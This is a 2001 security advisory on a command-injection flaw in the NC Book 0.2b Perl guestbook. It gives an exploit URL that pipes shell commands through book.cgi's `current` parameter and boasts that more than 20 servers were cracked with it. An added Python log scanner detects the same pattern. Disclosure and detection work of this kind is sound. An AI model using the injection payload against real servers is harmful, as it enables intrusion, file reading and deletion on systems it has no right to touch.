NetCode NC Book 0.2b remote command execution vulnerability

From: Hannibal Lector (digitalseedat_private)
Date: Mon Aug 13 2001 - 12:14:38 PDT


    * more than 20 servers were successfully cracked 
    using this 'little' hole *
    
    ------[ PoizonB0x Advisory#6 pb0x-06-08-2001 ]---------
    
    -NAME:
     NetCode NC Book 0.2b remote command execution 
    vulnerability.
    
    -DESCRIPTION: 
     NetCode's GuestBook. Find more info about it here:
    http://netcode.lgg.ru/vault/ncbook/
    
    -PROBLEM:
     A pretty big hole in the main script of that guestbook 
    leads to command execution on the remote server 
    running this vulnerable perl script.
    
    
    -EXPLOIT: 
    ex.: http://target/cgi-bin/ncbook/book.cgi?action=default&current=|ls -la/|&form_tid=996604045&prev=main.html&list_message_index=10
    
    !The above line, if given, will output the file contents of 
    the kernel dir. You can also execute any commands 
    (ls, cat, rm, etc.)
    
    
    -AUTHORs:
     Discovery: digitalseed and ksenor
     Advisory: digitalseed
    
    -DISCLAIMER:
     PoizonB0x may not be held liable for the use or 
    potential effects of these programs or advisories, nor 
    the content contained within. Use them at your own 
    risk.
    
    -COPYRIGHT:
     PoizonB0x Crew - 
     www.poizonb0x.org (c) 2000-2001
      L...Future Security...l
    
    ------[ PoizonB0x Advisory#1 pb0x-06-08-2001 ]---------
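
A defender's check for the request pattern shown under EXPLOIT, as an added example that is not part of the original advisory or of NC Book: it scans access-log lines for book.cgi requests whose `current` parameter contains shell metacharacters after URL-decoding. The log lines are constructed samples, and the function name, the metacharacter set and the Common Log Format layout are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Metacharacters that can turn a filename value into a pipe or shell command
# (assumed set; widen or narrow it for your environment).
SHELL_META = re.compile(r"[|;&`$<>\x00\r\n]")

# Client address and request target from a Common Log Format line. The target
# is matched lazily so that a raw, unencoded space inside it is still captured.
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (.+?)(?: HTTP/[\d.]+)?" \d{3}\b')

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Aug/2001:12:00:01 -0700] "GET /cgi-bin/ncbook/book.cgi'
    '?action=default&current=main.html&list_message_index=10 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [13/Aug/2001:12:00:09 -0700] "GET /cgi-bin/ncbook/book.cgi'
    '?action=default&current=%7Cls%20-la/%7C&form_tid=996604045&prev=main.html'
    '&list_message_index=10 HTTP/1.0" 200 2048',
    '198.51.100.7 - - [13/Aug/2001:12:00:15 -0700] "GET /index.html HTTP/1.0" 200 900',
]


def flag_requests(lines, script="book.cgi", param="current"):
    """Return (client, decoded value) for every request to `script` whose
    `param` holds a shell metacharacter once URL-decoding is applied."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue  # only the guestbook script is of interest here
        # parse_qsl decodes %XX and '+', so encoded pipes are caught as well.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == param and SHELL_META.search(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in flag_requests(SAMPLE_LOG):
        print(f"{client} sent suspicious current={value!r}")
```

A hit means the request was made, not that the command ran; correlate with the response status and host-level evidence before drawing conclusions.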
    